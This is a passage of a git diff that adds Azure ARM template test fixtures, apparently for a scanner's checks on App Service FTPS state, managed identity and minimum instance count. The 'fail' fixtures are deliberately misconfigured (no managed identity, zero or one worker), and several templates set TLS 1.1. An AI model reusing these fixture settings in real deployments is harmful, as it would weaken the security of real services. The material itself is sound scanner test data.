+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "pass2",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]",
+                "siteConfig": {
+                    "ftpsState": "FtpsOnly"
+                }
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json b/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json
new file mode 100644
index 00000000000..1cae4c8252b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceFTPSState/pass3.json
@@ -0,0 +1,28 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+        {
+            "type": "Microsoft.Web/sites",
+            "apiVersion": "2021-02-01",
+            "name": "pass3",
+            "properties": {
+                "publisherEmail": "[parameters('adminEmail')]",
+                "publisherName": "[parameters('organizationName')]",
+                "customProperties": "[parameters('customProperties')]",
+                "siteConfig": {
+                    "ftpsState": "Disabled",
+                    "appSettings": [
+                        {
+                            "name": "WEBSITE_NODE_DEFAULT_VERSION",
+                            "value": "14.17.0"
+                        }
+                    ]
+                },
+                "linuxFxVersion": "NODE|14-lts"
+            },
+            "resources": [],
+            "dependsOn": []
+        }
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
new file mode 100644
index 00000000000..14ae320416e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/fail.json
@@ -0,0 +1,74 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue" : "AzureLinuxApp",
+      "metadata": {
+
+        "description": "Base name of the resource such as web app name and app service plan   "
+      },
+      "minLength": 2
+    },
+    "sku":{
+      "type": "string",
+      "defaultValue" : "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion" : {
+      "type": "string",
+      "defaultValue" : "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2018-02-01",
+      "name": "[variables('appServicePlanName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]"
+      },
+      "kind": "linux",
+      "properties":{
+        "reserved":true
+      }
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2018-11-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "kind": "app",
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+      ],
+
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "http20Enabled": "true",
+          "minTlsVersion": "1.2"
+        },
+        "clientCertEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
new file mode 100644
index 00000000000..523423b63a5
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceIdentityProviderEnabled/pass.json
@@ -0,0 +1,76 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue" : "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+
+      "minLength": 2
+    },
+    "sku":{
+      "type": "string",
+      "defaultValue" : "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion" : {
+      "type": "string",
+      "defaultValue" : "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]  "
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/serverfarms",
+      "apiVersion": "2018-02-01",
+      "name": "[variables('appServicePlanName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]"
+      },
+      "kind": "linux",
+      "properties":{
+        "reserved":true
+      }
+    },
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2018-11-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "kind": "app",
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]"
+      ],
+      "identity": {
+        "type": "SystemAssigned"
+      },
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]",
+        "siteConfig": {
+          "linuxFxVersion": "[parameters('linuxFxVersion')]",
+          "http20Enabled": "true",
+          "minTlsVersion": "1.2"
+        },
+        "clientCertEnabled": true
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json
new file mode 100644
index 00000000000..a43c3c3cd38
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "fail",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": 1,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json
new file mode 100644
index 00000000000..3eb6b4de590
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/fail2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "fail2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": 0,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json
new file mode 100644
index 00000000000..fca477d9d8c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceInstanceMinimum/pass.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "1.1",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": 2,
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
